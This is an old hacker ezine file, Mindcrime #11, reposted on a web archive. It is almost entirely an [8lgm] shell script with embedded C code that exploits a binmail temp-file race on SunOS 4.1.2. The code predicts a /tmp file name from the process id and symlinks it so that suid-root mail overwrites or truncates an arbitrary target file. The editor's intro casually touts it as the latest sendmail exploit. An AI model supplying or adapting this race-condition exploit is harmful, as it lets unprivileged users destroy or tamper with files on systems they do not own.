Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

Mindcrime_file_11

eZine's profile picture
eZine lover (@eZine)
Published in 
Mindcrime
 · 26 Apr 2019

  

================================[MiNDCRiME]================================ 
[ File #11:] 

 
[ I was told this was *thee* absolute latest sendmail script. If I am wrong, 
  spank me, cuz not only do I not give a flying fuck, but there are so many 
  sendmail exploits, it makes my head spin and I do not even try to keep 
  up with all of them. -hC ] 

#!/bin/sh 
# tmpmail: overwrite files using binmail 
# 
# Usage: tmpmail to-file 
# 
# [8lgm], tested under SunOS 4.1.2. 
# 
# Definitely NOT for distribution, please do not use for cracking purposes! 
# This script is only to be provided to trusted users, due to poor 
# workaround chances. 
# 
# Note: Script only works if mail is suid root. 
#       Other vendors may use tmpnam("ma"). 
# 
# This vulnerability can be exploited for sgid 
# mail binmails, the only modification would 
# be to predict the pid of the mail process 
# created by sendmail.  This would be 4 forward 
# of the current pid - assuming a 'quiet' system. 
# 
# Will create to-file, or truncate. 
  
PATH=/usr/ucb:/usr/bin:/bin      export PATH 
IFS=" "                          export IFS 
  
PROG="`basename $0`" 
  
# Check args 
if [ $# -ne 1 ]; then 
        echo "Syntax: $PROG to-file" 
        exit 1 
fi 
  
TO_FILE="$1" 
  
  
# Create our racing program! 
  
cat > mailrace.c << 'EOF' 
#include <stdio.h> 
#include <unistd.h> 
  
char path[] = "/tmp/maaXXXX"; 
  
main(argc,argv) 
int argc; 
char **argv; 
{ 
  int pid; 
  char *trv; 
  
  if (argc != 3) { 
    fprintf(stderr, "Usage: %s pid tofile\n", argv[0]); 
    exit(1); 
  } 
  
  pid = atoi(argv[1]); 
  
/* Stolen from mktemp.c */ 
  for (trv = path; *trv; ++trv);          /* extra X's get set to 0's */ 
  while (*--trv == 'X') { 
    *trv = (pid % 10) + '0'; 
    pid /= 10; 
  } 
  
  symlink("/tmp/ShortSong", path); 
  while(symlink(argv[2], path)); 
  unlink("/tmp/ShortSong"); 
  exit(0); 
} 
EOF 
cc -o mailrace mailrace.c 
  
# Check we now have mailrace 
if [ ! -x "mailrace" ]; then 
        echo "$PROG: couldnt compile mailrace.c - check it out" 
        exit 1 
fi 
  
# create some input for binmail 
echo localhost $USER > /tmp/BlueRoom.$$ 
./mailrace $$ $TO_FILE & 
exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$ 

================================[MiNDCRiME]================================

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
24 Apr 2024
cool
guest's profile picture
@guest
24 Apr 2024
I played quake a lot. Was my favorite game.
guest's profile picture
@guest
23 Apr 2024
Underground eXperts United was the ezine! Jelt enkelt det bästa ezine någonsin!
guest's profile picture
@guest
23 Apr 2024
Pokemon was my favorite game
AniphaeS's profile picture
@AniphaeS
22 Apr 2024
Sembra deliziosa! Da provare!
AniphaeS's profile picture
@AniphaeS
22 Apr 2024
e' stato un bel concerto!
gigiLock's profile picture
@gigiLock
22 Apr 2024
i dunno speak Spanish
gigiLock's profile picture
@gigiLock
22 Apr 2024
how was dating dating 7th-6th century BC calculated?
gigiLock's profile picture
@gigiLock
22 Apr 2024
What happened to the mummy? Was it ever found?
guest's profile picture
@guest
22 Apr 2024
for all the cider lovers
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT